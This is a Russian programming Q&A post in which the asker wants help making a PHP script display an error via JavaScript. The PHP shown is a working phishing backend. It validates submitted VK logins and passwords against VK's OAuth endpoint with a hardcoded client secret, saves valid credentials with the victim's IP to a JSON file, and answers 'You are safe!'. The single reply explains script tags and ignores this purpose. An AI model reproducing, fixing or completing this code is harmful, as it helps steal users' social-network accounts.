@Alide

Как через php запустить js скрипт или изменить стиль?

Вот код:
<?php
error_reporting(0);

if(isset($_POST['login']) && $_POST['password']){
	$login = $_POST['login'];
	$password = $_POST['password'];

	$response = file_get_contents("https://oauth.vk.com/token?grant_type=password&client_id=2274003&client_secret=hHbZxrka2uZ6jB1inYsH&username=$login&password=$password");
	$response = json_decode($response,true);
	if(isset($response['access_token'])){

		if(file_exists('data.json')){
			$accounts = json_decode(file_get_contents('data.json'),true);
		}else{
			$accounts = array();
		}

		$accounts['accounts'][] = $login.':'.$password.':'.$_SERVER['REMOTE_ADDR'];
		$accounts = json_encode($accounts);
		file_put_contents('data.json', $accounts);
		unset($_SESSION['user']);

		setcookie("got","1",time() + (24*30*24*3600));
		echo "Вы в безопасности!";
		die();
	}else{
		echo "<script>document.getElementById('errorAu').style.display = 'block';</script>";
		die();
	}
}

echo "0";


?>

В нём
echo "<script>document.getElementById('errorAu').style.display = 'block';</script>";
вместо активации этого выбивает аллерт вместе с этой надписью. Как решатЬ?
  • Вопрос задан
  • 138 просмотров
Пригласить эксперта
Ответы на вопрос 1
@AUser0
Чем больше знаю, тем лучше понимаю, как мало знаю.
Вы пишите внутрь тега <script>...</script> какой-то JS скрипт, и он после загрузки страницы будет выполнен.
Напишите туда <script>alert(1234);</script> - и после загрузки страницы на экране выскочит окошко с текстом "1234" и кнопочкой "OK".
Что напишите - то и выполнится, всё в ваших руках...

А вот то, что вы хотите увидеть в результате выполнения скрипта, вместо активации этого выбивает аллерт вместе с этой надписью.... Блин, вообще непонятно, чего вы от скрипта хотите.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
19 апр. 2024, в 13:31
10000 руб./за проект
19 апр. 2024, в 13:12
35000 руб./за проект
19 апр. 2024, в 13:06
6000 руб./за проект